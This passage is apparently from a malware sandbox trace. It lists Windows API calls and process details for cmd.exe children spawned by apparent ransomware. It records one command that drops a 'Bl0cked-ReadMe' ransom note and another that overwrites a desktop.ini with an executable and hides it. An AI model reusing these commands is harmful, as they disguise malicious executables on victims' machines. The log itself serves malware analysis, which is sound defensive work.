lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x4, lpData=0x30eaf0*=0x9, lpcbData=0x30eae8*=0x4) returned 0x0 [0149.492] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30eaec, lpData=0x30eaf0, lpcbData=0x30eae8*=0x1000 | out: lpType=0x30eaec*=0x0, lpData=0x30eaf0*=0x9, lpcbData=0x30eae8*=0x1000) returned 0x2 [0149.492] RegCloseKey (hKey=0x40) returned 0x0 [0149.492] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886378 [0149.492] srand (_Seed=0x5b886378) [0149.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"" [0149.492] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf\"" [0149.492] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.492] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x431928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0149.492] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0149.492] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0149.493] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.493] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0149.493] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0149.493] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0149.493] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0149.493] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0149.493] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0149.493] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0149.493] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0149.493] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0149.493] GetEnvironmentStringsW () returned 0x432318* [0149.493] FreeEnvironmentStringsW (penv=0x432318) returned 1 [0149.493] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.493] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0149.493] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0149.493] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0149.493] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0149.493] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0149.493] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0149.493] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0149.493] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0149.493] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0149.493] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x30f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f8b0, lpFilePart=0x30f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f8ac*="Desktop") returned 0x18 [0149.493] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f62c | out: lpFindFileData=0x30f62c) returned 0x430058 [0149.494] FindClose (in: hFindFile=0x430058 | out: hFindFile=0x430058) returned 1 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f62c | out: lpFindFileData=0x30f62c) returned 0x430058 [0149.494] FindClose (in: hFindFile=0x430058 | out: hFindFile=0x430058) returned 1 [0149.494] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f62c | out: lpFindFileData=0x30f62c) returned 0x430058 [0149.494] FindClose (in: hFindFile=0x430058 | out: hFindFile=0x430058) returned 1 [0149.494] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0149.494] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0149.494] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0149.494] GetEnvironmentStringsW () returned 0x432b38* [0149.495] FreeEnvironmentStringsW (penv=0x432b38) returned 1 [0149.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0149.495] GetConsoleOutputCP () returned 0x1b5 [0149.495] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.495] GetUserDefaultLCID () returned 0x409 [0149.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0149.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f9f0, cchData=128 | out: lpLCData="0") returned 2 [0149.495] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f9f0, cchData=128 | out: lpLCData="0") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f9f0, cchData=128 | out: lpLCData="1") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0149.496] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0149.496] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0149.497] GetConsoleTitleW (in: lpConsoleTitle=0x420908, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0149.497] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.497] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0149.497] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0149.497] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0149.498] _wcsicmp (_String1="type", _String2=")") returned 75 [0149.498] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0149.498] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0149.498] _wcsicmp (_String1="IF", _String2="type") returned -11 [0149.498] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0149.498] _wcsicmp (_String1="REM", _String2="type") returned -2 [0149.498] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0149.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.502] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.502] GetFileType (hFile=0x7) returned 0x2 [0149.503] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0149.503] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30f8e8 | out: lpMode=0x30f8e8) returned 1 [0149.503] _dup (_FileHandle=1) returned 3 [0149.503] _close (_FileHandle=1) returned 0 [0149.503] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0149.503] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\device~1\\device\\{8702d~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x30f8b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.530] GetLastError () returned 0x20 [0149.530] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0149.531] _close (_FileHandle=3) returned 0 [0149.531] _get_osfhandle (_FileHandle=2) returned 0xb [0149.531] GetFileType (hFile=0xb) returned 0x2 [0149.531] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0149.531] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x30f864 | out: lpMode=0x30f864) returned 1 [0149.531] _get_osfhandle (_FileHandle=2) returned 0xb [0149.532] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x30f898 | out: lpConsoleScreenBufferInfo=0x30f898) returned 1 [0149.532] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0149.533] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30f8d8 | out: lpBuffer="The process cannot access the file because it is being used by another process.\r\n") returned 0x51 [0149.533] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x51, lpNumberOfCharsWritten=0x30f8bc, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30f8bc*=0x51) returned 1 [0149.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.534] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.534] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.534] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.534] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.534] SetConsoleInputExeNameW () returned 0x1 [0149.534] GetConsoleOutputCP () returned 0x1b5 [0149.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.534] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.534] exit (_Code=1) Process: id = "231" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0x698" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{8702D~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 19285 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 19286 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 19287 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 19288 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 19289 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 19290 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 19291 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 19292 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 19293 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 19294 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 19295 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 19296 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 19297 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 19298 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 19299 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 19300 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 19301 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 19302 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 19303 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 19304 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 19305 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 19306 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 19307 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 19308 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 19309 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 19310 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 19311 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 19312 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 19313 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 19314 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 19315 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 19316 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 19317 start_va = 0x600000 end_va = 0x11fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 19318 start_va = 0x1200000 end_va = 0x1362fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 19324 start_va = 0x1370000 end_va = 0x163efff entry_point = 0x1370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 293 os_tid = 0xc58 [0149.601] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af914 | out: lpSystemTimeAsFileTime=0x2af914*(dwLowDateTime=0x931af880, dwHighDateTime=0x1d440a9)) [0149.601] GetCurrentProcessId () returned 0x698 [0149.601] GetCurrentThreadId () returned 0xc58 [0149.601] GetTickCount () returned 0x2e54f [0149.601] QueryPerformanceCounter (in: lpPerformanceCount=0x2af90c | out: lpPerformanceCount=0x2af90c*=20639173314) returned 1 [0149.603] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0149.603] __set_app_type (_Type=0x1) [0149.603] __p__fmode () returned 0x76b331f4 [0149.603] __p__commode () returned 0x76b331fc [0149.604] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0149.604] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0149.604] GetCurrentThreadId () returned 0xc58 [0149.604] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc58) returned 0x38 [0149.604] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0149.604] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0149.604] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.604] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0149.604] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af8a4 | out: phkResult=0x2af8a4*=0x0) returned 0x2 [0149.604] VirtualQuery (in: lpAddress=0x2af8db, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.604] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0149.605] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0149.605] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0149.605] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af874, dwLength=0x1c | out: lpBuffer=0x2af874*(BaseAddress=0x2b0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0149.605] GetConsoleOutputCP () returned 0x1b5 [0149.605] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0149.605] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0149.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.605] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0149.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.605] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0149.605] _get_osfhandle (_FileHandle=1) returned 0x7 [0149.605] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0149.605] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.606] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0149.606] _get_osfhandle (_FileHandle=0) returned 0x3 [0149.606] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0149.606] GetEnvironmentStringsW () returned 0x330598* [0149.606] FreeEnvironmentStringsW (penv=0x330598) returned 1 [0149.606] GetEnvironmentStringsW () returned 0x330598* [0149.606] FreeEnvironmentStringsW (penv=0x330598) returned 1 [0149.606] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae814 | out: phkResult=0x2ae814*=0x40) returned 0x0 [0149.606] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x48, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.606] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x0, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegCloseKey (hKey=0x40) returned 0x0 [0149.607] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae814 | out: phkResult=0x2ae814*=0x40) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x40, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x0, lpData=0x2ae820*=0x1, lpcbData=0x2ae818*=0x1000) returned 0x2 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae81c, lpData=0x2ae820, lpcbData=0x2ae818*=0x1000 | out: lpType=0x2ae81c*=0x4, lpData=0x2ae820*=0x0, lpcbData=0x2ae818*=0x4) returned 0x0 [0149.607] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, 